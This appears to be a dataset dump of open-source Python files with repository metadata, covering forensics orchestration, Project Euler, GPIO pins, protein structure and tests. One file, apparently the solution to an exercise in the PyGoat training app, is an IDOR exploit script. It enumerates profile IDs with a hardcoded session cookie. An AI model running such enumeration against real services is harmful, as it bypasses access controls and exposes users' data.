hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acfa5aa027e7a67d259a229029fc60af12339d78 | 16,971 | py | Python | dftimewolf/lib/state.py | jonathan-greig/dftimewolf | 9f055033cfd866f76ad94891354f7e9db4b74528 | [
"Apache-2.0"
] | null | null | null | dftimewolf/lib/state.py | jonathan-greig/dftimewolf | 9f055033cfd866f76ad94891354f7e9db4b74528 | [
"Apache-2.0"
] | null | null | null | dftimewolf/lib/state.py | jonathan-greig/dftimewolf | 9f055033cfd866f76ad94891354f7e9db4b74528 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""This class maintains the internal dfTimewolf state.
Use it to track errors, abort on global failures, clean up after modules, etc.
"""
import importlib
import logging
import threading
import traceback
from typing import Callable, Dict, List, Sequence, TYPE_CHECKING, Type, Any, TypeVar, cast # pylint: disable=line-too-long
from dftimewolf.config import Config
from dftimewolf.lib import errors, utils
from dftimewolf.lib.errors import DFTimewolfError
from dftimewolf.lib.modules import manager as modules_manager
if TYPE_CHECKING:
from dftimewolf.lib import module as dftw_module
from dftimewolf.lib.containers import interface
T = TypeVar("T", bound="interface.AttributeContainer") # pylint: disable=invalid-name,line-too-long
# TODO(tomchop): Consider changing this to `dftimewolf.state` if we ever need
# more granularity.
# Module-level logger; all classes in this file log through it.
logger = logging.getLogger('dftimewolf')
# Shown to users when an unexpected (non-DFTimewolfError) error occurred,
# see CheckErrors() below.
NEW_ISSUE_URL = 'https://github.com/log2timeline/dftimewolf/issues/new'
class DFTimewolfState(object):
  """The main State class.

  The state is shared by every module of a recipe: it holds the module pool,
  an inter-module container store, per-module threading events used to order
  execution, and the errors collected along the way.

  Attributes:
    command_line_options (dict[str, str]): Command line options passed to
        dftimewolf.
    config (dftimewolf.config.Config): Class to be used throughout execution.
    errors (list[tuple[str, bool]]): errors generated by a module. These
        should be cleaned up after each module run using the CleanUp() method.
    global_errors (list[tuple[str, bool]]): the CleanUp() method moves non
        critical errors to this attribute for later reporting.
    input (list[str]): data that the current module will use as input.
    output (list[str]): data that the current module generates.
    recipe: (dict[str, str]): recipe declaring modules to load.
    store (dict[str, object]): arbitrary data for modules.

  Note: `input` and `output` are documented above but are not initialized in
  __init__ below.
  """

  def __init__(self, config: Type[Config]) -> None:
    """Initializes a state."""
    super(DFTimewolfState, self).__init__()
    self.command_line_options = {}  # type: Dict[str, str]
    # Arbitrary key/value cache shared between modules; guarded by
    # _state_lock (see AddToCache / GetFromCache).
    self._cache = {}  # type: Dict[str, str]
    # runtime name -> instantiated module object, filled by LoadRecipe().
    self._module_pool = {}  # type: Dict[str, dftw_module.BaseModule]
    self._state_lock = threading.Lock()
    # One Event per module runtime name; set when that module has finished
    # (or was skipped), so dependent modules can wait on it.
    self._threading_event_per_module = {}  # type: Dict[str, threading.Event]
    self.config = config
    self.errors = []  # type: List[DFTimewolfError]
    self.global_errors = []  # type: List[DFTimewolfError]
    self.recipe = {}  # type: Dict[str, Any]
    self.store = {}  # type: Dict[str, List[interface.AttributeContainer]]
    self.streaming_callbacks = {}  # type: Dict[Type[interface.AttributeContainer], List[Callable[[Any], Any]]]  # pylint: disable=line-too-long
    # Set to True by AddError() on the first critical error; checked by
    # _RunModuleThread to skip modules that have not started yet.
    self._abort_execution = False

  def _InvokeModulesInThreads(self, callback: Callable[[Any], Any]) -> None:
    """Invokes the callback function on all the modules in separate threads.

    Blocks until every thread has finished, then raises via CheckErrors() if
    any critical error was collected.

    Args:
      callback (function): callback function to invoke on all the modules.
    """
    threads = []
    for module_definition in self.recipe['modules']:
      thread_args = (module_definition, )
      thread = threading.Thread(target=callback, args=thread_args)
      threads.append(thread)
      thread.start()
    for thread in threads:
      thread.join()
    self.CheckErrors(is_global=True)

  def ImportRecipeModules(self, module_locations: Dict[str, str]) -> None:
    """Dynamically loads the modules declared in a recipe.

    Args:
      module_locations (dict[str, str]): A dfTimewolf module name - Python
          module mapping. e.g.:
          {'GRRArtifactCollector': 'dftimewolf.lib.collectors.grr_hosts'}

    Raises:
      errors.RecipeParseError: if a module requested in a recipe does not
          exist in the mapping, or its Python module cannot be imported.
    """
    for module in self.recipe['modules'] + self.recipe.get('preflights', []):
      name = module['name']
      if name not in module_locations:
        msg = (f'In {self.recipe["name"]}: module {name} cannot be found. '
               'It may not have been declared.')
        raise errors.RecipeParseError(msg)
      logger.debug('Loading module {0:s} from {1:s}'.format(
          name, module_locations[name]))
      location = module_locations[name]
      try:
        # Import for side effects only; LoadRecipe() later looks the module
        # class up through the modules manager.
        importlib.import_module(location)
      except ModuleNotFoundError as exception:
        msg = f'Cannot find Python module for {name} ({location}): {exception}'
        raise errors.RecipeParseError(msg)

  def LoadRecipe(self,
                 recipe: Dict[str, Any],
                 module_locations: Dict[str, str]) -> None:
    """Populates the internal module pool with modules declared in a recipe.

    Args:
      recipe (dict[str, Any]): recipe declaring modules to load.
      module_locations (dict[str, str]): dfTimewolf module name to Python
          module mapping, passed through to ImportRecipeModules().

    Raises:
      RecipeParseError: if a module in the recipe has not been declared.
    """
    self.recipe = recipe
    module_definitions = recipe.get('modules', [])
    preflight_definitions = recipe.get('preflights', [])
    self.ImportRecipeModules(module_locations)
    for module_definition in module_definitions + preflight_definitions:
      # Combine CLI args with args from the recipe description
      module_name = module_definition['name']
      module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
      # Fall back to the module name when no runtime name is given.
      runtime_name = module_definition.get('runtime_name')
      if not runtime_name:
        runtime_name = module_name
      self._module_pool[runtime_name] = module_class(self, name=runtime_name)

  def FormatExecutionPlan(self) -> str:
    """Formats execution plan.

    Formats information about loaded modules and their corresponding
    arguments.

    Returns:
      str: String representation of loaded modules and their parameters.
    """
    plan = ""
    maxlen = 0
    modules = self.recipe.get('preflights', []) + self.recipe.get('modules', [])
    # First pass: find the longest argument name so values line up.
    for module in modules:
      if not module['args']:
        continue
      spacing = len(max(module['args'].keys(), key=len))
      maxlen = maxlen if maxlen > spacing else spacing
    for module in modules:
      runtime_name = module.get('runtime_name')
      if runtime_name:
        plan += '{0:s} ({1:s}):\n'.format(runtime_name, module['name'])
      else:
        plan += '{0:s}:\n'.format(module['name'])
      new_args = utils.ImportArgsFromDict(
          module['args'], self.command_line_options, self.config)
      if not new_args:
        plan += ' *No params*\n'
      for key, value in new_args.items():
        plan += ' {0:s}{1:s}\n'.format(key.ljust(maxlen + 3), repr(value))
    return plan

  def LogExecutionPlan(self) -> None:
    """Logs the result of FormatExecutionPlan() using the base logger."""
    for line in self.FormatExecutionPlan().split('\n'):
      logger.debug(line)

  def AddToCache(self, name: str, value: Any) -> None:
    """Thread-safe method to add data to the state's cache.

    If the cached item is already in the cache it will be
    overwritten with the new value.

    Args:
      name (str): string with the name of the cache variable.
      value (object): the value that will be stored in the cache.
    """
    with self._state_lock:
      self._cache[name] = value

  def GetFromCache(self, name: str, default_value: Any=None) -> Any:
    """Thread-safe method to get data from the state's cache.

    Args:
      name (str): string with the name of the cache variable.
      default_value (object): the value that will be returned if
          the item does not exist in the cache. Optional argument
          and defaults to None.

    Returns:
      object: object from the cache that corresponds to the name, or
          the value of "default_value" if the cache does not contain
          the variable.
    """
    with self._state_lock:
      return self._cache.get(name, default_value)

  def StoreContainer(self, container: "interface.AttributeContainer") -> None:
    """Thread-safe method to store data in the state's store.

    Containers are bucketed by their CONTAINER_TYPE class attribute.

    Args:
      container (AttributeContainer): data to store.
    """
    with self._state_lock:
      self.store.setdefault(container.CONTAINER_TYPE, []).append(container)

  def GetContainers(self,
                    container_class: Type[T],
                    pop: bool=False) -> Sequence[T]:
    """Thread-safe method to retrieve data from the state's store.

    Args:
      container_class (type): AttributeContainer class used to filter data.
      pop (Optional[bool]): Whether to remove the containers from the state
          when they are retrieved.

    Returns:
      Collection[AttributeContainer]: attribute container objects provided in
          the store that correspond to the container type.
    """
    with self._state_lock:
      container_objects = cast(
          List[T], self.store.get(container_class.CONTAINER_TYPE, []))
      if pop:
        self.store[container_class.CONTAINER_TYPE] = []
      # Return an immutable snapshot so callers cannot mutate the store.
      return tuple(container_objects)

  def _SetupModuleThread(self, module_definition: Dict[str, str]) -> None:
    """Calls the module's SetUp() function and sets a threading event for it.

    Callback for _InvokeModulesInThreads.

    Args:
      module_definition (dict[str, str]): recipe module definition.
    """
    module_name = module_definition['name']
    runtime_name = module_definition.get('runtime_name', module_name)
    logger.info('Setting up module: {0:s}'.format(runtime_name))
    new_args = utils.ImportArgsFromDict(
        module_definition['args'], self.command_line_options, self.config)
    module = self._module_pool[runtime_name]
    try:
      module.SetUp(**new_args)
    except errors.DFTimewolfError:
      # NOTE(review): the error itself is only logged here — presumably the
      # module already recorded it on the state via AddError(); confirm.
      msg = "A critical error occurred in module {0:s}, aborting execution."
      logger.critical(msg.format(module.name))
    except Exception as exception:  # pylint: disable=broad-except
      msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
          module.name, exception)
      logger.critical(msg)
      # We're catching any exception that is not a DFTimewolfError, so we want
      # to generate an error for further reporting.
      error = errors.DFTimewolfError(
          message=msg, name='state', stacktrace=traceback.format_exc(),
          critical=True, unexpected=True)
      self.AddError(error)
    # Create the module's completion event (set later by _RunModuleThread).
    self._threading_event_per_module[runtime_name] = threading.Event()
    self.CleanUp()

  def SetupModules(self) -> None:
    """Performs setup tasks for each module in the module pool.

    Threads declared modules' SetUp() functions. Takes CLI arguments into
    account when replacing recipe parameters for each module.
    """
    # Note that vars() copies the values of argparse.Namespace to a dict.
    self._InvokeModulesInThreads(self._SetupModuleThread)

  def _RunModuleThread(self, module_definition: Dict[str, str]) -> None:
    """Runs the module's Process() function.

    Callback for _InvokeModulesInThreads.

    Waits for any blockers to have finished before running Process(), then
    sets an Event flag declaring the module has completed.

    Args:
      module_definition (dict): module definition.
    """
    module_name = module_definition['name']
    runtime_name = module_definition.get('runtime_name', module_name)
    # Block until every module listed in 'wants' has set its event.
    for dependency in module_definition['wants']:
      self._threading_event_per_module[dependency].wait()
    module = self._module_pool[runtime_name]
    # Abort processing if a module has had critical failures before.
    if self._abort_execution:
      logger.critical(
          'Aborting execution of {0:s} due to previous errors'.format(
              module.name))
      # Still set the event so dependent modules do not wait forever.
      self._threading_event_per_module[runtime_name].set()
      self.CleanUp()
      return
    logger.info('Running module: {0:s}'.format(runtime_name))
    try:
      module.Process()
    except errors.DFTimewolfError:
      logger.critical(
          "Critical error in module {0:s}, aborting execution".format(
              module.name))
    except Exception as exception:  # pylint: disable=broad-except
      msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
          module.name, exception)
      logger.critical(msg)
      # We're catching any exception that is not a DFTimewolfError, so we want
      # to generate an error for further reporting.
      error = errors.DFTimewolfError(
          message=msg, name='state', stacktrace=traceback.format_exc(),
          critical=True, unexpected=True)
      self.AddError(error)
    logger.info('Module {0:s} finished execution'.format(runtime_name))
    self._threading_event_per_module[runtime_name].set()
    self.CleanUp()

  def RunPreflights(self) -> None:
    """Runs preflight modules."""
    for preflight_definition in self.recipe.get('preflights', []):
      preflight_name = preflight_definition['name']
      runtime_name = preflight_definition.get('runtime_name', preflight_name)
      args = preflight_definition.get('args', {})
      new_args = utils.ImportArgsFromDict(
          args, self.command_line_options, self.config)
      preflight = self._module_pool[runtime_name]
      try:
        preflight.SetUp(**new_args)
        preflight.Process()
      finally:
        # Always surface errors, even if SetUp()/Process() raised.
        self.CheckErrors(is_global=True)

  def CleanUpPreflights(self) -> None:
    """Executes any cleanup actions defined in preflight modules."""
    for preflight_definition in self.recipe.get('preflights', []):
      preflight_name = preflight_definition['name']
      runtime_name = preflight_definition.get('runtime_name', preflight_name)
      preflight = self._module_pool[runtime_name]
      try:
        preflight.CleanUp()
      finally:
        self.CheckErrors(is_global=True)

  def InstantiateModule(self, module_name: str) -> "dftw_module.BaseModule":
    """Instantiates an arbitrary dfTimewolf module.

    Unlike LoadRecipe(), this does not register the module in the pool.

    Args:
      module_name (str): The name of the module to instantiate.

    Returns:
      BaseModule: An instance of a dftimewolf Module, which is a subclass of
          BaseModule.
    """
    module_class: Type["dftw_module.BaseModule"]
    module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
    return module_class(self)

  def RunModules(self) -> None:
    """Performs the actual processing for each module in the module pool."""
    self._InvokeModulesInThreads(self._RunModuleThread)

  def RegisterStreamingCallback(
      self,
      target: Callable[["interface.AttributeContainer"], Any],
      container_type: Type["interface.AttributeContainer"]) -> None:
    """Registers a callback for a type of container.

    The function to be registered should accept a single parameter of type
    interface.AttributeContainer.

    Args:
      target (function): function to be called.
      container_type (type[interface.AttributeContainer]): container type on
          which the callback will be called.
    """
    if container_type not in self.streaming_callbacks:
      self.streaming_callbacks[container_type] = []
    self.streaming_callbacks[container_type].append(target)

  def StreamContainer(self, container: "interface.AttributeContainer") -> None:
    """Streams a container to the callbacks that are registered to handle it.

    Args:
      container (interface.AttributeContainer): container instance that will
          be streamed to any registered callbacks.
    """
    # Dispatch is on the exact runtime type (no subclass matching here).
    for callback in self.streaming_callbacks.get(type(container), []):
      callback(container)

  def AddError(self, error: DFTimewolfError) -> None:
    """Adds an error to the state.

    A critical error also flags the whole run for abortion: modules that
    have not yet started will be skipped by _RunModuleThread.

    Args:
      error (errors.DFTimewolfError): The dfTimewolf error to add.
    """
    if error.critical:
      self._abort_execution = True
    self.errors.append(error)

  def CleanUp(self) -> None:
    """Cleans up after running a module.

    The state's output becomes the input for the next stage. Any errors are
    moved to the global_errors attribute so that they can be reported at a
    later stage.
    """
    # Move any existing errors to global errors
    self.global_errors.extend(self.errors)
    self.errors = []

  def CheckErrors(self, is_global: bool=False) -> None:
    """Checks for errors and raises if any of them are critical.

    Args:
      is_global (Optional[bool]): True if the global_errors attribute should
          be checked. False if the error attribute should be checked.

    Raises:
      errors.CriticalError: if at least one critical error was collected.
    """
    error_objects = self.global_errors if is_global else self.errors
    critical_errors = False
    if error_objects:
      logger.error('dfTimewolf encountered one or more errors:')
      for index, error in enumerate(error_objects):
        logger.error('{0:d}: error from {1:s}: {2:s}'.format(
            index+1, error.name, error.message))
        if error.stacktrace:
          for line in error.stacktrace.split('\n'):
            logger.error(line)
        if error.critical:
          critical_errors = True
    if any(error.unexpected for error in error_objects):
      # Unexpected errors are bugs in dfTimewolf itself; point users at the
      # issue tracker.
      logger.critical('One or more unexpected errors occurred.')
      logger.critical(
          'Please consider opening an issue: {0:s}'.format(NEW_ISSUE_URL))
    if critical_errors:
      raise errors.CriticalError('Critical error found. Aborting.')
| 37.298901 | 144 | 0.685463 |
acfa5cfbc7cc6eb3d9fec59853124eee4dca148c | 1,249 | py | Python | Solutions/0021.py | zejacobi/ProjectEuler | 3e5731597784ee9433e9f2249b7ea92dc93527ee | [
"Unlicense"
] | 1 | 2018-01-26T14:11:54.000Z | 2018-01-26T14:11:54.000Z | Solutions/0021.py | zejacobi/ProjectEuler | 3e5731597784ee9433e9f2249b7ea92dc93527ee | [
"Unlicense"
] | null | null | null | Solutions/0021.py | zejacobi/ProjectEuler | 3e5731597784ee9433e9f2249b7ea92dc93527ee | [
"Unlicense"
] | null | null | null | """
# PROBLEM 21
Let d(n) be defined as the sum of proper divisors of n
(numbers less than n which divide evenly into n).
If d(a) = b and d(b) = a, where a != b, then a and b are an amicable pair and each of a and b are
called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110;
therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
"""
from math import sqrt, ceil
amicable_numbers = []  # collects every member of each amicable pair found below
def d(n):
    """Return the sum of the proper divisors of n (divisors smaller than n).

    Divisors are found in pairs (i, n // i) while i*i <= n, so this runs in
    O(sqrt(n)). This fixes two defects of the sqrt/ceil version: the square
    root of a perfect square is no longer skipped (the old code gave
    d(16) == 11 instead of 15), and integer division keeps the result an
    int instead of a float.
    """
    if n < 2:
        # 0 and 1 have no proper divisors.
        return 0
    total = 1  # 1 divides every n >= 2
    i = 2
    while i * i <= n:
        if n % i == 0:
            total += i
            partner = n // i
            if partner != i:  # don't double-count the root of a perfect square
                total += partner
        i += 1
    return total
# Scan every candidate below 10,000 for membership in an amicable pair.
for candidate in range(1, 10000):
    if candidate in amicable_numbers:
        # Already recorded as the partner of an earlier candidate.
        continue
    partner = d(candidate)
    # An amicable pair needs two *distinct* numbers whose proper-divisor sums
    # point at each other; perfect numbers (d(n) == n) are excluded.
    if partner == candidate or d(partner) != candidate:
        continue
    amicable_numbers.append(candidate)
    if partner < 10000:
        # Only record the partner when it is also below the limit.
        amicable_numbers.append(partner)
print(sum(amicable_numbers))
| 30.463415 | 97 | 0.648519 |
acfa5d14396b015cfb66c7312e5b87bcc2dc8c3b | 697 | py | Python | src/adafruit_blinka/board/raspi_40pin.py | ansarid/Adafruit_Blinka | 18765a52c16c4a58deabb92ce4607b125c1c1b98 | [
"MIT"
] | null | null | null | src/adafruit_blinka/board/raspi_40pin.py | ansarid/Adafruit_Blinka | 18765a52c16c4a58deabb92ce4607b125c1c1b98 | [
"MIT"
] | null | null | null | src/adafruit_blinka/board/raspi_40pin.py | ansarid/Adafruit_Blinka | 18765a52c16c4a58deabb92ce4607b125c1c1b98 | [
"MIT"
] | null | null | null | """Pin definitions for 40-pin Raspberry Pi models."""
from adafruit_blinka.microcontroller.bcm283x import pin
# Plain BCM GPIO names.
D0 = pin.D0
D1 = pin.D1
D2 = pin.D2
SDA = pin.SDA  # I2C data line
D3 = pin.D3
SCL = pin.SCL  # I2C clock line
D4 = pin.D4
D5 = pin.D5
D6 = pin.D6
D7 = pin.D7
CE1 = pin.D7  # SPI0 chip-enable 1, alias of D7
D8 = pin.D8
CE0 = pin.D8  # SPI0 chip-enable 0, alias of D8
D9 = pin.D9
MISO = pin.D9  # SPI0 MISO, alias of D9
D10 = pin.D10
MOSI = pin.D10  # SPI0 MOSI, alias of D10
D11 = pin.D11
SCLK = pin.D11  # SPI0 clock, alias of D11
SCK = pin.D11  # alternate spelling of SCLK
D12 = pin.D12
D13 = pin.D13
D14 = pin.D14
TXD = pin.D14  # UART transmit, alias of D14
D15 = pin.D15
RXD = pin.D15  # UART receive, alias of D15
D16 = pin.D16
D17 = pin.D17
D18 = pin.D18
D19 = pin.D19
MISO_1 = pin.D19  # SPI1 MISO, alias of D19
D20 = pin.D20
MOSI_1 = pin.D20  # SPI1 MOSI, alias of D20
D21 = pin.D21
SCLK_1 = pin.D21  # SPI1 clock, alias of D21
SCK_1 = pin.D21  # alternate spelling of SCLK_1
D22 = pin.D22
D23 = pin.D23
D24 = pin.D24
D25 = pin.D25
D26 = pin.D26
D27 = pin.D27
| 13.150943 | 55 | 0.657102 |
acfa5e92a89956ecc4ce608a3e598a6e695e5996 | 3,367 | py | Python | oddt/toolkits/common.py | mwojcikowski/oddt | 3b58b15b530e97a90d958fe8b862f16605b6da1f | [
"BSD-3-Clause"
] | null | null | null | oddt/toolkits/common.py | mwojcikowski/oddt | 3b58b15b530e97a90d958fe8b862f16605b6da1f | [
"BSD-3-Clause"
] | null | null | null | oddt/toolkits/common.py | mwojcikowski/oddt | 3b58b15b530e97a90d958fe8b862f16605b6da1f | [
"BSD-3-Clause"
] | null | null | null | """Code common to all toolkits"""
import numpy as np
from oddt.spatial import dihedral, distance
def detect_secondary_structure(res_dict):
    """Detect alpha helices and beta sheets in res_dict by phi and psi angles.

    `res_dict` is expected to be a numpy structured array with the fields
    used below: 'N', 'CA', 'C', 'O' (atom coordinates), 'id', 'resnum' and
    the boolean output fields 'isalpha'/'isbeta', which are filled in-place.
    # assumes that layout -- TODO confirm against callers

    Returns the same res_dict with its 'isalpha'/'isbeta' flags updated.
    """
    # Consecutive residue pairs: each backbone dihedral is defined between
    # residue i ("first") and residue i+1 ("second").
    first = res_dict[:-1]
    second = res_dict[1:]
    psi = dihedral(first['N'], first['CA'], first['C'], second['N'])
    phi = dihedral(first['C'], second['N'], second['CA'], second['C'])
    # d == 1 means the two residues have consecutive ids (no chain break).
    d = second['id'] - first['id']
    # Alpha helices
    res_mask_alpha = (((phi > -145) & (phi < -35) &
                       (psi > -70) & (psi < 50) & (d == 1)))  # alpha
    # union1d of the index array with itself yields sorted, unique indices.
    res_mask_alpha = np.union1d(np.argwhere(res_mask_alpha),
                                np.argwhere(res_mask_alpha))
    # Ignore groups smaller than 3 (split at breaks in consecutive indices)
    for mask_group in np.split(res_mask_alpha, np.argwhere(np.diff(res_mask_alpha) != 1).flatten() + 1):
        if len(mask_group) >= 3:
            res_dict['isalpha'][mask_group] = True
    # Alpha helices have to form H-Bonds: N..O pairs closer than 3.5 between
    # residues at least 3 apart in sequence.
    hbond_dist_mask = np.abs(res_dict[res_dict['isalpha']]['resnum'] -
                             res_dict[res_dict['isalpha']]['resnum'][:, np.newaxis]) >= 3
    hbond_mask = distance(res_dict[res_dict['isalpha']]['N'],
                          res_dict[res_dict['isalpha']]['O']) < 3.5
    p_mask = ((hbond_mask & hbond_dist_mask).any(axis=0) |
              (hbond_mask & hbond_dist_mask).any(axis=1))
    # Clear the alpha flag for residues without such an H-bond partner.
    res_dict['isalpha'][np.argwhere(res_dict['isalpha']).flatten()[~p_mask]] = False
    # Ignore groups smaller than 3 (re-check after the H-bond filter)
    res_mask_alpha = np.argwhere(res_dict['isalpha']).flatten()
    for mask_group in np.split(res_mask_alpha, np.argwhere(np.diff(res_mask_alpha) != 1).flatten() + 1):
        if 0 < len(mask_group) < 3:
            res_dict['isalpha'][mask_group] = False
    # Beta sheets
    res_mask_beta = (((phi >= -180) & (phi < -40) &
                      (psi <= 180) & (psi > 90) & (d == 1)) |
                     ((phi >= -180) & (phi < -70) &
                      (psi <= -165) & (d == 1)))  # beta
    res_mask_beta = np.union1d(np.argwhere(res_mask_beta),
                               np.argwhere(res_mask_beta))
    # Ignore groups smaller than 3
    for mask_group in np.split(res_mask_beta, np.argwhere(np.diff(res_mask_beta) != 1).flatten() + 1):
        if len(mask_group) >= 3:
            res_dict['isbeta'][mask_group] = True
    # Beta strands have to be alongside eachother: N..O < 3.5 or CA..CA < 4.5
    # between residues at least 4 apart in sequence.
    res_dist_mask = np.abs(res_dict[res_dict['isbeta']]['resnum'] -
                           res_dict[res_dict['isbeta']]['resnum'][:, np.newaxis]) >= 4
    hbond_mask = distance(res_dict[res_dict['isbeta']]['N'],
                          res_dict[res_dict['isbeta']]['O']) < 3.5
    ca_mask = distance(res_dict[res_dict['isbeta']]['CA'],
                       res_dict[res_dict['isbeta']]['CA']) < 4.5
    p_mask = ((hbond_mask & res_dist_mask).any(axis=0) |
              (hbond_mask & res_dist_mask).any(axis=1) |
              (ca_mask & res_dist_mask).any(axis=0))
    res_dict['isbeta'][np.argwhere(res_dict['isbeta']).flatten()[~p_mask]] = False
    # Ignore groups smaller than 3
    res_mask_beta = np.argwhere(res_dict['isbeta']).flatten()
    for mask_group in np.split(res_mask_beta, np.argwhere(np.diff(res_mask_beta) != 1).flatten() + 1):
        if 0 < len(mask_group) < 3:
            res_dict['isbeta'][mask_group] = False
    return res_dict
| 46.123288 | 104 | 0.579151 |
acfa5eb912f0a0521f79414043c6be750a4dd1ee | 421 | py | Python | app/solutions/payloads/idor_solution.py | monkey-test/PyGoat | 218accb37e0aa1c7cbbc5a577cf701f88caf76c6 | [
"MIT"
] | 4 | 2020-06-05T19:27:24.000Z | 2020-08-28T03:52:34.000Z | app/solutions/payloads/idor_solution.py | monkey-test/PyGoat | 218accb37e0aa1c7cbbc5a577cf701f88caf76c6 | [
"MIT"
] | 2 | 2020-05-23T08:56:31.000Z | 2021-05-11T15:44:15.000Z | app/solutions/payloads/idor_solution.py | monkey-test/PyGoat | 218accb37e0aa1c7cbbc5a577cf701f88caf76c6 | [
"MIT"
] | 2 | 2021-02-18T16:17:50.000Z | 2022-03-14T20:22:55.000Z | import requests
url = "http://localhost:5000/idor/profiles/"
headers = {"cookie": "session=eyJ1c2VybmFtZSI6InRlc3QifQ.EWaHZQ.TRftfGBwIDUpw36Ql1t7rh9PVn8"}

# Probe a small window of sequential profile ids and report the first one
# that responds without a server error, skipping id 23988.
for profile_id in range(23980, 23990):
    response = requests.get("%s%d" % (url, profile_id), headers=headers)
    if response.status_code == 500 or profile_id == 23988:
        continue
    print("id: %d" % profile_id, "status code: %d" % response.status_code, "response: %s" % response.text)
    break
| 38.272727 | 101 | 0.674584 |
acfa5f215b5bab280aab98080447ebf2ec8732e4 | 8,486 | py | Python | compass/tests/deployment/installers/test_config_manager.py | leah03/test-originrepo | fc022a3e2b20f1a4f2de8e4403695aec003671d0 | [
"Apache-2.0"
] | 2 | 2016-04-16T09:09:55.000Z | 2022-02-07T19:48:13.000Z | compass/tests/deployment/installers/test_config_manager.py | leah03/test-originrepo | fc022a3e2b20f1a4f2de8e4403695aec003671d0 | [
"Apache-2.0"
] | null | null | null | compass/tests/deployment/installers/test_config_manager.py | leah03/test-originrepo | fc022a3e2b20f1a4f2de8e4403695aec003671d0 | [
"Apache-2.0"
] | 3 | 2016-04-01T01:34:00.000Z | 2022-02-07T19:48:14.000Z | # Copyright 2014 Huawei Technologies Co. Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test config_manager module."""
import os
import unittest2
# Must be set before the compass settings wrapper is imported; presumably
# makes compass ignore on-disk settings during tests -- TODO confirm.
os.environ['COMPASS_IGNORE_SETTING'] = 'true'
from compass.utils import setting_wrapper as compass_setting
# Re-import so the wrapper observes the environment variable set above.
reload(compass_setting)
from compass.deployment.installers.config_manager import BaseConfigManager
from compass.deployment.utils import constants as const
from compass.tests.deployment.test_data import config_data
from compass.utils import flags
from compass.utils import logsetting
class TestConfigManager(unittest2.TestCase):
    """Test ConfigManager methods.

    All expected values are derived from the fixtures in
    compass.tests.deployment.test_data.config_data.
    """

    def setUp(self):
        super(TestConfigManager, self).setUp()
        self.adapter_test_info = config_data.adapter_test_config
        self.cluster_test_info = config_data.cluster_test_config
        self.hosts_test_info = config_data.hosts_test_config
        # System under test, built fresh for every test case.
        self.test_config_manager = BaseConfigManager(self.adapter_test_info,
                                                     self.cluster_test_info,
                                                     self.hosts_test_info)

    def tearDown(self):
        super(TestConfigManager, self).tearDown()
        del self.test_config_manager

    def test_get_cluster_baseinfo(self):
        """Basic cluster metadata (id, name, OS) is returned as-is."""
        expected_output = {
            "id": 1,
            "name": "test",
            "os_name": "Ubuntu-12.04-x86_64"
        }
        output = self.test_config_manager.get_cluster_baseinfo()
        self.maxDiff = None
        self.assertDictEqual(expected_output, output)

    def test_get_host_id_list(self):
        """All host ids from the hosts fixture are listed."""
        expected_output = [1, 2, 3]
        output = self.test_config_manager.get_host_id_list()
        self.assertEqual(expected_output, output)

    def test_get_cluster_roles_mapping(self):
        """Each role maps to the list of hosts (with networks) holding it."""
        expected_output = {
            "os_controller": [{
                "hostname": "server01",
                "management": {
                    "interface": "vnet0",
                    "ip": "12.234.32.100",
                    "netmask": "255.255.255.0",
                    "is_mgmt": True,
                    "is_promiscuous": False,
                    "subnet": "12.234.32.0/24"
                },
                "tenant": {
                    "interface": "vnet1",
                    "ip": "172.16.1.1",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": False,
                    "subnet": "172.16.1.0/24"
                }
            }],
            "os_compute_worker": [{
                "hostname": "server02",
                "management": {
                    "interface": "eth0",
                    "ip": "12.234.32.101",
                    "netmask": "255.255.255.0",
                    "is_mgmt": True,
                    "is_promiscuous": False,
                    "subnet": "12.234.32.0/24"
                },
                "tenant": {
                    "interface": "eth1",
                    "ip": "172.16.1.2",
                    "netmask": "255.255.255.0",
                    "is_mgmt": False,
                    "is_promiscuous": False,
                    "subnet": "172.16.1.0/24"
                }
            }, {
                "hostname": "server03",
                "management": {
                    "interface": "eth0",
                    "ip": "12.234.32.103",
                    "is_mgmt": True,
                    "is_promiscuous": False,
                    "netmask": "255.255.255.0",
                    "subnet": "12.234.32.0/24"
                },
                'public': {
                    "interface": "eth2",
                    "ip": "10.0.0.1",
                    "is_mgmt": False,
                    "is_promiscuous": True,
                    "netmask": "255.255.255.0",
